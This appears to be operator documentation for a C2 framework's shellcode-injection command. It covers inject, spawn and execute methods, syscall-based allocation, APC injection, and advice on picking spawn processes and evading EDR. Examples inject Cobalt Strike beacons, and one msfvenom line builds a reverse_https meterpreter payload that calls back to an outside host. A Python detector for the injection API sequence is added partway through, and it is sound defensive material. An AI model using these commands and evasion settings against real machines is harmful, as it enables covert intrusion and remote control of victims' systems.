Overview

The shellcode command provides capabilities for injecting raw shellcode into processes using either process injection (into existing processes) or fork & run (spawning new processes). Multiple injection techniques are supported with varying OPSEC profiles.

Syntax

shellcode [method] [arch] [pid|path] [arguments]

Injection Methods

inject

Inject shellcode into an existing process.
shellcode inject [arch] [pid] [path-to-shellcode] [arguments]
arch (string, required): Architecture of the shellcode:
  • x86 - 32-bit shellcode
  • x64 - 64-bit shellcode
pid (integer, required): Process ID of the target process to inject into
path-to-shellcode (string, required): Local path to the raw shellcode file (it will be uploaded to the agent)
arguments (string, optional): Arguments to pass to the shellcode (base64 encoded)

spawn

Spawn a new process and inject shellcode (fork & run).
shellcode spawn [arch] [path-to-shellcode] [arguments]
arch (string, required): Architecture:
  • x86 - Spawns a 32-bit process
  • x64 - Spawns a 64-bit process
path-to-shellcode (string, required): Local path to the raw shellcode file
arguments (string, optional): Arguments to pass to the shellcode

execute

Execute shellcode directly in the current process.
shellcode execute [arch] [path-to-shellcode] [arguments]
Executing shellcode in-process is risky and may crash the agent if the shellcode is incompatible or malformed.

Injection Techniques

The injection technique can be configured using the config command:
config inject.technique [technique_id]
Uses the default injection method configured in the profile.
Process Flow:
  1. Open target process
  2. Allocate memory (respects config memory.alloc)
  3. Write shellcode
  4. Protect memory (respects config memory.execute)
  5. Create thread (respects config inject.technique)

Memory Allocation Techniques

Configure memory allocation method:
config memory.alloc [technique_id]
  • 0 - VirtualAllocEx (Win32 API)
  • 1 - NtAllocateVirtualMemory (Indirect syscall)

Memory Protection Techniques

Configure memory protection method:
config memory.execute [technique_id]
  • 0 - VirtualProtectEx (Win32 API)
  • 1 - NtProtectVirtualMemory (Indirect syscall)

Return Values

status (string): Injection result:
  • INJECT_ERROR_SUCCESS (0) - Injection succeeded
  • INJECT_ERROR_FAILED (1) - General failure
  • INJECT_ERROR_INVALID_PARAM (2) - Invalid parameters
  • INJECT_ERROR_PROCESS_ARCH_MISMATCH (3) - Architecture mismatch
thread_id (integer): Thread ID of the created thread (if successful)

Examples

Basic Process Injection

# Find target process
proc grep explorer

# Inject x64 shellcode into explorer.exe (PID 1520)
shellcode inject x64 1520 /path/to/beacon.bin

Fork & Run with Configured Spawn Process

# Set spawn process (if not using profile default)
config inject.spawn64 C:\Windows\System32\werfault.exe

# Spawn and inject
shellcode spawn x64 /path/to/beacon.bin

Advanced Injection with Custom Technique

# Configure injection settings for maximum evasion
config memory.alloc 1         # Use NtAllocateVirtualMemory
config memory.execute 1       # Use NtProtectVirtualMemory
config inject.technique 3     # Use NtQueueApcThread

# Inject shellcode
shellcode inject x64 2048 /path/to/shellcode.bin

Shellcode with Arguments

# Inject Cobalt Strike beacon with arguments
shellcode inject x64 1520 /path/to/beacon.bin "arg1 arg2 arg3"

32-bit Injection

# Set 32-bit spawn process
config inject.spawn32 C:\Windows\SysWOW64\werfault.exe

# Inject 32-bit shellcode
shellcode spawn x86 /path/to/shellcode32.bin

OPSEC Considerations

Shellcode injection is heavily monitored by EDR solutions. Use indirect syscalls and legitimate spawn processes.

Process Selection

Good Injection Targets:
  • Long-running system processes
  • Processes with legitimate network activity
  • Processes matching your shellcode architecture
Avoid:
  • Protected processes (PPL)
  • Antivirus/EDR processes
  • System critical processes (csrss.exe, lsass.exe)

Spawn Process Selection

Configure legitimate-looking spawn processes:
# Common legitimate processes
config inject.spawn64 C:\Windows\System32\werfault.exe
config inject.spawn64 C:\Windows\System32\dllhost.exe
config inject.spawn64 C:\Windows\System32\svchost.exe

API Call Flow

Depending on configuration, the following API sequence is used. With INJECTION_TECHNIQUE_SYSCALL and all syscall options enabled:
  1. CreateProcessA (spawning only)
  2. NtAllocateVirtualMemory* (indirect syscall)
  3. NtWriteVirtualMemory* (indirect syscall)
  4. NtProtectVirtualMemory* (indirect syscall)
  5. NtCreateThreadEx* or NtQueueApcThread* (indirect syscall)
  6. NtResumeThread* (indirect syscall)
Note: * indicates indirect syscall usage

Memory Permissions

  • Avoid RWX memory if possible (highly suspicious)
  • Use RW allocation, write shellcode, then change to RX
  • Configure with memory.alloc and memory.execute

Detection Vectors

  1. Process Open: Opening handles to inject into processes
  2. Memory Allocation: Allocating executable memory in remote processes
  3. Thread Creation: Creating threads in remote processes
  4. Memory Permissions: RWX memory regions
  5. Shellcode Signatures: Known beacon/payload signatures
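The API Call Flow, Memory Permissions and Detection Vectors sections above describe what a sensor sees when this command runs. The following is an added example (not Havoc's own code) of detection logic over that sequence: it flags any RWX allocation or protection change, and flags a caller that allocates, writes and then starts a thread or queues an APC in another process. The event shape (caller_pid, api, target_pid, protect) and the sample events are constructed assumptions.

```python
"""Flag the remote-injection API sequence and RWX memory in API-call telemetry.
Added example (not Havoc's code); the event shape (caller_pid, api, target_pid,
protect) is an assumption standing in for what a kernel-level sensor records."""
from collections import defaultdict

# API names from the page's call flow, grouped by the step each one performs.
ALLOC = {"VirtualAllocEx", "NtAllocateVirtualMemory"}
WRITE = {"WriteProcessMemory", "NtWriteVirtualMemory"}
PROTECT = {"VirtualProtectEx", "NtProtectVirtualMemory"}
EXECUTE = {"CreateRemoteThread", "NtCreateThreadEx", "NtQueueApcThread"}
PAGE_EXECUTE_READWRITE = 0x40  # RWX, the protection the page calls highly suspicious

def analyze(events):
    """Return (finding, caller_pid, target_pid, api) tuples in event order:
    'rwx_memory' for any allocation or protection change to RWX, and
    'remote_injection' when one caller allocates, writes, then starts a thread or
    queues an APC in a *different* process (the page's allocate/write/protect/execute order)."""
    stage = defaultdict(int)  # (caller, target) -> steps of the sequence seen so far
    findings = []
    for caller, api, target, protect in events:
        if api in ALLOC | PROTECT and protect == PAGE_EXECUTE_READWRITE:
            findings.append(("rwx_memory", caller, target, api))
        if caller == target:
            continue  # in-process use (the page's `execute` method) is a separate vector
        key = (caller, target)
        if api in ALLOC:
            stage[key] = max(stage[key], 1)
        elif api in WRITE and stage[key] >= 1:
            stage[key] = 2
        elif api in EXECUTE and stage[key] == 2:
            stage[key] = 3
            findings.append(("remote_injection", caller, target, api))
    return findings

# Constructed sample telemetry (not captured from a real system); PIDs are made up.
SAMPLE_EVENTS = [
    (300, "ReadProcessMemory", 1520, None),         # benign: a debugger reading memory
    (4100, "NtAllocateVirtualMemory", 1520, 0x04),  # RW allocation in PID 1520
    (4100, "NtWriteVirtualMemory", 1520, None),
    (4100, "NtProtectVirtualMemory", 1520, 0x20),   # RW -> RX, the page's recommended flow
    (4100, "NtQueueApcThread", 1520, None),         # APC completes the chain
    (5200, "VirtualAllocEx", 2048, 0x40),           # RWX allocation, flagged on its own
    (5200, "WriteProcessMemory", 2048, None),
    (5200, "CreateRemoteThread", 2048, None),
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

Because indirect syscalls bypass user-mode API hooks, the events this runs over must come from a kernel-level source (kernel callbacks or ETW-Ti), not from hooked DLLs.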

Use Cases

Cobalt Strike Beacon Injection

# Generate raw beacon
# In Cobalt Strike: Attacks -> Packages -> Windows Executable (S) -> Output: Raw

# Upload to teamserver and inject
shellcode inject x64 1520 /path/to/beacon.bin

Metasploit Payload Injection

# Generate raw shellcode
# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f raw -o payload.bin

# Inject into target
shellcode spawn x64 /path/to/payload.bin

Custom Shellcode Runner

# Set up OPSEC-friendly configuration
config memory.alloc 1
config memory.execute 1
config inject.technique 3
config inject.spawn64 C:\Windows\System32\RuntimeBroker.exe

# Execute custom shellcode
shellcode spawn x64 /path/to/custom.bin

Architecture Mismatch

Injecting shellcode into a process with mismatched architecture will fail:
  • Cannot inject x64 shellcode into x86 process
  • Cannot inject x86 shellcode into x64 process (WoW64 exception may apply)
Always verify target process architecture:
proc list | grep target_process

Configuration Summary

# View current injection configuration
config show

# Recommended OPSEC settings
config memory.alloc 1              # Syscall allocation
config memory.execute 1            # Syscall protection
config inject.technique 3          # APC injection
config inject.spawn64 C:\Windows\System32\dllhost.exe
config inject.spawn32 C:\Windows\SysWOW64\dllhost.exe

Notes

  • Shellcode files are automatically chunked for upload (max 30MB per chunk)
  • Injection respects the configured injection technique
  • Failed injections return error codes for troubleshooting
  • Always test shellcode in a lab environment first
  • Some shellcode (like Cobalt Strike beacons) may require specific arguments
  • Suspended processes created with proc create suspended are good injection targets